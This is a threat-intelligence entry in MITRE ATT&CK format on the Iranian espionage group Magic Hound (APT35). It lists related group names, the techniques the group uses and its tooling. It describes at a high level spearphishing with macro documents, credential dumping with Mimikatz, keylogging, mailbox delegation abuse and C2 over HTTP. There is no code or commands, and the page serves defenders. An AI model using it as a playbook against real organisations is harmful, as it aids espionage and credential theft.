Magic Hound

Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive operations to collect intelligence, dating back as early as 2014. The group typically targets U.S. and the Middle Eastern military, as well as other organizations with government personnel, via complex social engineering campaigns.[1]

ID: G0059
Associated Groups: Cobalt Gypsy, Operation Woolen-Goldfish, Ajax Security Team, Operation Saffron Rose, Rocket Kitten, Phosphorus, Newscaster, APT35
Contributors: Bryan Lee
Version: 2.0
Created: 16 January 2018
Last Modified: 04 July 2020

Associated Group Descriptions

Name Description
Cobalt Gypsy

Based on overlapping hash values in reporting, Magic Hound activity appears to overlap with activity conducted by the group known as Cobalt Gypsy.[2]

Operation Woolen-Goldfish

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Woolen-Goldfish.[3]

Ajax Security Team

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the group Ajax Security Team.[3]

Operation Saffron Rose

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Saffron Rose.[3]

Rocket Kitten

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the adversary group Rocket Kitten.[3][4]

Phosphorus

[5]

Newscaster

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).[3][1]

APT35

[1]

Techniques Used

Domain ID Name Use
Enterprise T1098 .002 Account Manipulation: Exchange Email Delegate Permissions

Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.[1]

Enterprise T1071 Application Layer Protocol

Magic Hound malware has used IRC for C2.[3]

.001 Web Protocols

Magic Hound malware has used HTTP for C2.[3]

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

Magic Hound has used RAR to stage and compress local folders.[1]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Magic Hound malware has used Registry Run keys to establish persistence.[3]

Enterprise T1059 .005 Command and Scripting Interpreter: Visual Basic

Magic Hound malware has used VBS scripts for execution.[3]

.003 Command and Scripting Interpreter: Windows Command Shell

Magic Hound has used the command-line interface.[3]

.001 Command and Scripting Interpreter: PowerShell

Magic Hound has used PowerShell for execution and privilege escalation.[3][1]

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

Magic Hound used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage.[6]

Enterprise T1114 .001 Email Collection: Local Email Collection

Magic Hound has collected .PST archives.[1]

Enterprise T1083 File and Directory Discovery

Magic Hound malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.[3]

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Magic Hound malware has a function to determine whether the C2 server wishes to execute the newly dropped file in a hidden window.[3]

Enterprise T1070 .004 Indicator Removal on Host: File Deletion

Magic Hound has deleted and overwrote files to cover tracks.[3][1]

Enterprise T1105 Ingress Tool Transfer

Magic Hound has downloaded additional code and files from servers onto victims.[3] Magic Hound used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.[6][6]

Enterprise T1056 .001 Input Capture: Keylogging

Magic Hound malware is capable of keylogging.[3] Magic Hound used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.[6]

Enterprise T1571 Non-Standard Port

Magic Hound malware has communicated with its C2 server over TCP port 4443 using HTTP.[3]

Enterprise T1027 Obfuscated Files or Information

Magic Hound malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.[3]

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

Magic Hound stole domain credentials from Microsoft Active Directory Domain Controller and leveraged Mimikatz.[1]

Enterprise T1566 .002 Phishing: Spearphishing Link

Magic Hound sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.

.001 Phishing: Spearphishing Attachment

Magic Hound has used personalized spearphishing attachments.[6]

.003 Phishing: Spearphishing via Service

Magic Hound used various social media channels to spearphish victims.[7][8][5]

Enterprise T1057 Process Discovery

Magic Hound malware can list running processes.[3]

Enterprise T1113 Screen Capture

Magic Hound malware can take a screenshot and upload the file to its C2 server.[3]

Enterprise T1082 System Information Discovery

Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.[3]

Enterprise T1016 System Network Configuration Discovery

Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address.[3]

Enterprise T1033 System Owner/User Discovery

Magic Hound malware has obtained the victim username and sent it to the C2 server.[3]

Enterprise T1204 .002 User Execution: Malicious File

Magic Hound has lured victims into executing malicious files.[7]

Enterprise T1102 .002 Web Service: Bidirectional Communication

Magic Hound malware can use a SOAP Web service to communicate with its C2 server.[3]

Software

ID Name References Techniques
S0186 DownPaper [4] Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Query Registry, System Information Discovery, System Owner/User Discovery
S0224 Havij [6] Exploit Public-Facing Application
S0002 Mimikatz [1] Access Token Manipulation: SID-History Injection, Account Manipulation, Boot or Logon Autostart Execution: Security Support Provider, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores, OS Credential Dumping: LSASS Memory, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets, Rogue Domain Controller, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Kerberos Tickets: Golden Ticket, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket
S0029 PsExec [1] Lateral Tool Transfer, Remote Services: SMB/Windows Admin Shares, System Services: Service Execution
S0192 Pupy [3][1] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Token Impersonation/Theft, Account Discovery: Local Account, Application Layer Protocol: Web Protocols, Archive Collected Data: Archive via Utility, Audio Capture, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Python, Create Account: Local Account, Create Account: Domain Account, Create or Modify System Process: Systemd Service, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Email Collection: Local Email Collection, Encrypted Channel: Asymmetric Cryptography, Exfiltration Over C2 Channel, File and Directory Discovery, Indicator Removal on Host: Clear Windows Event Logs, Ingress Tool Transfer, Input Capture: Keylogging, Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Network Service Scanning, Network Share Discovery, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, OS Credential Dumping: Cached Domain Credentials, Process Discovery, Process Injection: Dynamic-link Library Injection, Remote Services: Remote Desktop Protocol, Screen Capture, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Services: Service Execution, Unsecured Credentials: Credentials In Files, Use Alternate Authentication Material: Pass the Ticket, Video Capture, Virtualization/Sandbox Evasion: System Checks
S0225 sqlmap [6] Exploit Public-Facing Application

References